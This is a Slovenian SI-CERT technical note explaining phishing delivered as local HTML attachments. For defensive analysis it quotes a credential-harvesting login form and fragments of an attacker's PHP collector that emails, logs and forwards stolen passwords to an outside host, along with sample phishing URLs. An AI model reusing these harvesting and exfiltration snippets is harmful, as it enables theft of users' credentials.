Skoči na vsebino

SI-CERT TZ009 / Phishing brez gostovanja

Phishing je omrežni napad, katerega cilj je pridobitev različnih osebnih podatkov. V večini primerov gre za krajo uporabniških imen in gesel ter podatkov o kreditni kartici. Nekatere organizacije med phishing uvrščajo tudi druge vrste napadov, npr. elektronsko sporočilo z okuženo priponko ali vabe v SMS klube, na SI-CERT in večini drugih sorodnih organizacij pa je kategorija phishing incidentov omejena zgolj na neposreden poskus kraje osebnih podatkov, ki se v največ primerih začne preko elektronske pošte, občasno pa tudi preko SMS sporočil ali drugih zasebnih sporočil.

Phishing sporočilo prejemnika nagovarja h kliku na povezavo v sporočilu, običajno pod krinko nekega nepredvidenega dogodka, ki zahteva hitro ukrepanje. Povezava vodi na lažno spletno stran, ki zahteva vpis up. imena, gesla in drugih osebnih podatkov. Sporočilo običajno vsebuje grafične elemente in podobo ciljane storitve, npr. spletne pošte, Paypala, spletne banke ipd.

Primer phishing el. sporočila
Primer phishing el. sporočila

Povezava v sporočilu lahko vsebuje podatek o el. naslovu prejemnika. Običajno je ta podan kar neposredno kot parameter v naslovu, lahko pa je tudi zakodiran, npr. v base64 zakodiranem nizu, ali pa URL naslov vsebuje poseben identifikator, preko katerega napadalci prepoznajo posameznega uporabnika. Primeri:

https://wrtconstu4y3edg8sgcjsgyg.web.app/#test@cert.si
http://64644.laurterm.ro/#dGVzdEBjZXJ0LnNpCg==
https://online.post.si/tracking/N98646145/

Na ta način lahko lažna spletna stran predizpolne podatek o elektronskem naslovu, prav tako pa lahko izgled strani prilagodi glede na to, iz kje prihaja žrtev. Primer spodaj prikazuje lažno spletno stran, ki je v polju za vpis up. imena in gesla predizpolnila podatek o el. naslovu, za ozadje naložila vsebino iz spletne strani pod domeno iz el. naslova:

Primer lažne spletne strani
Spletna stran za ozadje naloži vsebino spletne strani pod domeno iz el. naslova

Phishing v html priponkah

Phishing spletne strani se običajno nahajajo na zlorabljenih spletnih strežnikih, ali pa napadalci za gostovanje zlorabijo legitimne storitve, npr. spletne ankete, spletne pisarniške aplikacije, ponudnike zastonjskega gostovanja ipd. Take spletne strani se lahko precej hitro uvrsti na sezname lažnih strani (t.i. blackliste), ki jih uporabljajo spletni brskalniki, poteg tega se večina ponudnikov storitev zaveda problema in lažne strani po ustaljenih postopkih precej hitro odstranijo. S temi ukrepi pa se tudi v celoti ustavi nek phishing napad. Kaj pa, če se phishing stran nahaja zgolj na računalniku prejemnika?

Če phishing sporočilo vsebuje phishing spletno stran v obliki priloženega HTML dokumenta, se lažna stran po odprtju priponke zgenerira lokalno v brskalniku uporabnika. Take strani ni možno blokirati preko seznama lažnih strani:

Primer phishing sporočila s phishing stranjo v html priponki
Primer phishing sporočila s phishing stranjo v html priponki
Primer lokalne phishing strani
Primer lokalne phishing strani

HTML datoteka vsebuje celoten CSS, javasctipt kodo (npr. za preverjanje vpisanih podatkov) ter slikovne v obliki “data:image” elementov. Podatki, vpisani v obrazec, se preko POST zahtevka pošljejo na PHP skripto na oddaljenem spletnem strežniku.

<div class="login" >
		<form action="https://[redacted].si/faccy/excell.php" method="post">
	  	  <div>
		<input type="email" id="email" name="email" placeholder="" value="aaa-podpora@arnes.si" />
		<div class="requirements"> 
		  Must be a valid email address.
		</div>
	  </div>
	  <div>
		<input type="password" id="password" name="password" required placeholder=" " />
		<label for="password">Password</label>
		<div class="requirements">
		  Your password must be at least 6 characters as well as contain at least one uppercase, one lowercase, and one number.
		</div>
	  </div>
	  <input type="submit" name="next" id="next" value="View Document" />
	</form>
	</div>

PHP koda na oddaljenem spletnem strežniku, ki sprejme podatke preko POST zahtevka, vsebuje 3 module, ki jih napadalci izbirno omogočijo: za pošiljanje podatkov na določen el. naslov, za zapis podatkov v datoteko, ter za pošiljanje podatkov na neko tretjo PHP skripto:

$subj = "EXCEL - $country - $email";
$headers .= "From: 505<$sender>\n";
$headers .= "X-Priority: 1\n"; //1 Urgent Message, 3 Normal
$headers .= "Content-Type:text/html; charset=\"iso-8859-1\"\n";
$over = 'http://mail.$emailID';
$msg = "<HTML><BODY>
 <TABLE>
 <tr><td>____fundz-444-Logs____</td></tr>
 <tr><td>ID: >$email<<td/></tr>
 <tr><td>Access: >$password<</td></tr>
 <tr><td>IP: $country | <a href='http://whoer.net/check?host=$ip' target='_blank'>$ip</a> </td></tr>
 <tr><td>>Anonymous Cyber Team<</td></tr>
 </BODY>
 </HTML>";
...
$r = on($dataset);
$handler=fopen('results.html','a');
fwrite($handler,$msg."================================\n");
fclose($handler);
...
$opts = array('http' =>
	array(
		'method'  => 'POST',
		'header'  => 'Content-Type: application/x-www-form-urlencoded',
		'content' => $data,
		'timeout' => 60 
	)
);
$context  = stream_context_create($opts);
$result = file_get_contents('http://www.[redacted].com/images/icons/1/index.php', false, $context);
return $result;
El. sporočilo z ukradenimi podatki, ki ga prejme napadalec
El. sporočilo z ukradenimi podatki, ki ga prejme napadalec

PHP skripta za sprejemanje vpisanih podatkov običajno vsebujejo tudi kodo, ki vrne neko napako, ter na koncu preusmeri na določeno spletno stran (npr. spletno stran napadene storitve). V bolj sofisticiranih primerih lahko vrne tudi lažno HTTP 404 Not Found napako, npr. če gre za HTTP zahtevek, ki odstopa od pričakovanega, ali če se IP naslov klienta ne nahaja v napadeni državi (geolokacijsko blokiranje). Na ta način dobi zunanji opazovalec lažen občutek, da je bila skripta za krajo podatkov že odstranjena iz strežnika, čeprav je dejansko še vedno aktivna.

echo '<script language="javascript">';
echo 'alert(" Incorrect Login details Try again ")';
echo '</script>';
echo "<script>history.back();</script>";
Primer lažno zgenerirane HTTP 404 napake
Primer lažno zgenerirane HTTP 404 napake

Preberite tudi

Nova spletna serija “Klik”

Na SI-CERT smo posneli novo spletno video serijo "KLIK", v kateri izpostavimo človeški vidik in prevare predstavimo skozi zgodbe žrtev.
Več

Microsoftovi popravki november 2021

Microsoft je 9.11.2021 izdal popravke za 55 varnostnih ranljivosti v njihovi programski opremi, med drugim tudi za dve 0-day ranljivosti, ki se že aktivno izkoriščata v napadih.
Več

Ameriška CISA objavila obširen katalog ranljivih produktov

Ameriška agencija CISA je objavila obširen katalog varnostnih ranljivosti, ki se aktivno izkoriščajo na omrežju. Ta je koristen pripomoček vsem skrbnikom IKT sistemov pri preverjanju potencialnih ranljivosti.
Več